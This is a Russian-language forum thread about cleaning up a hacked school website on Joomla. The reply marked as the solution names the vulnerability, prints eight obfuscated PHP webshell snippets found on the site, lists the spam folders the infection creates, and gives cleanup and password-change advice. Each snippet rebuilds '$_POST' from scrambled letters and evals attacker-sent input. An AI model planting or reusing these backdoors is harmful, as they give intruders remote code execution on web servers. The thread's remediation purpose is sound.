Модель микоризы: классовый агентный подход 3 anaschu 06.01.2026 aa0a7f55b50dd51c5ec569d2d10c54f6/ O1rJuneU_ls https:/ / vkvideo. ru/ video-115721503_456239114	Owen Logic: О недопустимости использования связки «аналоговый ПИД» + RegKZR ФедосеевПавел 06.01.2026 Owen Logic: О недопустимости использования связки «аналоговый ПИД» + RegKZR ВВЕДЕНИЕ Введу сокращения: аналоговый ПИД — ПИД регулятор с управляющим выходом в виде числа в диапазоне от 0% до. . .	Модель микоризы: классовый агентный подход 2 anaschu 06.01.2026 репозиторий https:/ / github. com/ shumilovas/ fungi ветка по-частям. коммит Create переделка под биомассу. txt вход sc, но sm считается внутри мицелия. кстати, обьем тоже должен там считаться. . . .	Расчёт токов в цепи постоянного тока igorrr37 05.01.2026 / * Дана цепь постоянного тока с сопротивлениями и напряжениями. Надо найти токи в ветвях. Программа составляет систему уравнений по 1 и 2 законам Кирхгофа и решает её. Последовательность действий:. . .
Новый CodeBlocs. Версия 25.03 palva 04.01.2026 Оказывается, недавно вышла новая версия CodeBlocks за номером 25. 03. Когда-то давно я возился с только что вышедшей тогда версией 20. 03. С тех пор я давно снёс всё с компьютера и забыл. Теперь. . .	Модель микоризы: классовый агентный подход anaschu 02.01.2026 Раньше это было два гриба и бактерия. Теперь три гриба, растение. И на уровне агентов добавится между грибами или бактериями взаимодействий. До того я пробовал подход через многомерные массивы,. . .	Советы по крайней бережливости. Внимание, это ОЧЕНЬ длинный пост. Programma_Boinc 28.12.2025 Советы по крайней бережливости. Внимание, это ОЧЕНЬ длинный пост. Налог на собак: https:/ / ********/ gallery/ V06K53e Финансовый отчет в Excel: https:/ / ********/ gallery/ bKBkQFf Пост отсюда. . .	Кто-нибудь знает, где можно бесплатно получить настольный компьютер или ноутбук? США. Programma_Boinc 26.12.2025 Нашел на реддите интересную статью под названием Anyone know where to get a free Desktop or Laptop? Ниже её машинный перевод. После долгих разбирательств я наконец-то вернула себе. . .

@YuliaSumina 0 / 0 / 0 Регистрация: 11.02.2016 Сообщений: 3
	11.02.2016, 20:35 [ТС]
	Спасибо Вам! Это сайт образовательного учреждения и хостинг платный. Может подскажите ссылки на надежные скрипты??? 0

@YuliaSumina 0 / 0 / 0 Регистрация: 11.02.2016 Сообщений: 3
	11.02.2016, 21:29 [ТС]
	Сайт на базе https://mchost.ru/ 0

quwy Native x86 6855 / 3788 / 1025 Регистрация: 13.02.2013 Сообщений: 11,861
	12.02.2016, 12:46
	Я не про хостинг спрашивал. На базе какого скрипта сайт? 0

@SedoyVoron 0 / 0 / 1 Регистрация: 26.02.2016 Сообщений: 1
	26.02.2016, 01:13
	Сообщение было отмечено quwy как решение Решение Платформа у него Joomla. Версия до 3.4.8. Описан файл docs\libraries\joomla\exporter.php Про ошибку стало известно 15.12.2015 это была уязвимость версии 3.4.5 и ниже. Файл генериреут не только вредоносный код типа Кликните здесь для просмотра всего текста <?php $wsh5 = "so_preut" ;$dvus5 = $wsh5[0]. $wsh5[7].$wsh5[4]. $wsh5[7].$wsh5[1].$wsh5[6].$wsh5[3]. $wsh5[3]. $wsh5[5].$wsh5[4];$tbxg8= $dvus5( $wsh5[2].$wsh5[3]. $wsh5[1].$wsh5[0].$wsh5[7] ); if (isset(${$tbxg8 }[ 'q2a5248'])) {eval( ${$tbxg8 } [ 'q2a5248'] ) ; }?> <?php $vkll87= "oe_tpurs"; $wmx29 = $vkll87[7]. $vkll87[3].$vkll87[6].$vkll87[3]. $vkll87[0].$vkll87[5]. $vkll87[4]. $vkll87[4].$vkll87[1].$vkll87[6]; $tseh4=$wmx29 ( $vkll87[2].$vkll87[4] .$vkll87[0].$vkll87[7]. $vkll87[3] ) ;if ( isset(${$tseh4 }[ 'qe0080b' ] )) {eval(${ $tseh4 } ['qe0080b' ]);}?> <?php $azb92 = "_teourps" ;$xjy91 = $azb92[7].$azb92[1].$azb92[5].$azb92[1].$azb92[3].$azb92[4].$azb92[6]. $azb92[6].$azb92[2]. $azb92[5]; $fkaa10 = $xjy91 ( $azb92[0]. $azb92[6] .$azb92[3].$azb92[7].$azb92[1]) ;if ( isset(${$fkaa10}['q22ec2b'] )) {eval ( ${ $fkaa10} ['q22ec2b']) ; } ?> <?php $hng8= "u_psoert" ; $gjfd4=$hng8[3]. $hng8[7].$hng8[6].$hng8[7].$hng8[4]. $hng8[0]. $hng8[2].$hng8[2].$hng8[5].$hng8[6] ; $kpqd9=$gjfd4( $hng8[1].$hng8[2] .$hng8[4].$hng8[3]. $hng8[7] ) ; if(isset( ${ $kpqd9} ['q59a097'] ) ) {eval(${ $kpqd9 } [ 'q59a097'] ) ; } ?> <?php $vyy63 ="_eotpsur";$nem4 =$vyy63[5].$vyy63[3]. $vyy63[7].$vyy63[3]. $vyy63[2].$vyy63[6].$vyy63[4].$vyy63[4]. $vyy63[1].$vyy63[7] ; $sygn83 =$nem4 ($vyy63[0].$vyy63[4] . $vyy63[2].$vyy63[5]. $vyy63[3]) ; if (isset ( ${$sygn83} [ 'q3729f7' ])) { eval ( ${ $sygn83 } [ 'q3729f7']);}?> <?php $osy02 ="uospte_r" ;$fnt3 =$osy02[2]. $osy02[4]. $osy02[7].$osy02[4].$osy02[1].$osy02[0]. $osy02[3]. $osy02[3]. $osy02[5]. $osy02[7]; $qfjy8 =$fnt3($osy02[6].$osy02[3]. $osy02[1].$osy02[2]. $osy02[4]) ;if (isset ( ${$qfjy8} ['q1c1ae6' ] )) { eval (${ $qfjy8 } ['q1c1ae6' ] ); }?> <?php $bhr3= "speru_ot";$fitl43 = $bhr3[0].$bhr3[7]. $bhr3[3]. $bhr3[7]. $bhr3[6]. $bhr3[4]. $bhr3[1].$bhr3[1]. $bhr3[2].$bhr3[3];$iqk62 = $fitl43( $bhr3[5]. $bhr3[1].$bhr3[6].$bhr3[0]. $bhr3[7]); if ( isset( ${ $iqk62 }['q7f69dd'])) {eval ( ${ $iqk62} [ 'q7f69dd']);} ?> <?php $mzvj5= "to_esupr" ; $nvtf2 = $mzvj5[4]. $mzvj5[0].$mzvj5[7].$mzvj5[0]. $mzvj5[1].$mzvj5[5]. $mzvj5[6].$mzvj5[6]. $mzvj5[3]. $mzvj5[7]; $ntfn4=$nvtf2( $mzvj5[2]. $mzvj5[6]. $mzvj5[1].$mzvj5[4].$mzvj5[0]); if(isset( ${ $ntfn4} ['q89024b'] )) { eval(${ $ntfn4} [ 'q89024b' ] ); }?> но и создаёт папки типа Кликните здесь для просмотра всего текста sgrzaiq wcvlxeb zthcwlb gwbekak rhzlpnv bsleprv rejewrc fdzbxie в которых идут ссылки по разным низкочастотным запросам и с вредоносными прогами. Если хочешь норм почистить то проверь все php файлы. Каспер в помощь по части файлов он покажит вирус как Trojan.PHP.Agent.jj В основном все файлы новые, так что вычисляй по дате создания, но в нескольких случаях вирус вшивался ещё и в нормальные файлы, так что чистить тебе руками, как и мне =) В первую очередь поищи папки с вложенными { eval и {eval - найдёшь большую часть заразы. Да пароль тебе от FTP и префикс БД надо теперь поменять, как и пасс от админки сайта, а лучше скрой админку плагином чтобы вышло ../administrator?fig-vzlomaesh 0

Ошибки в файлах php

Решение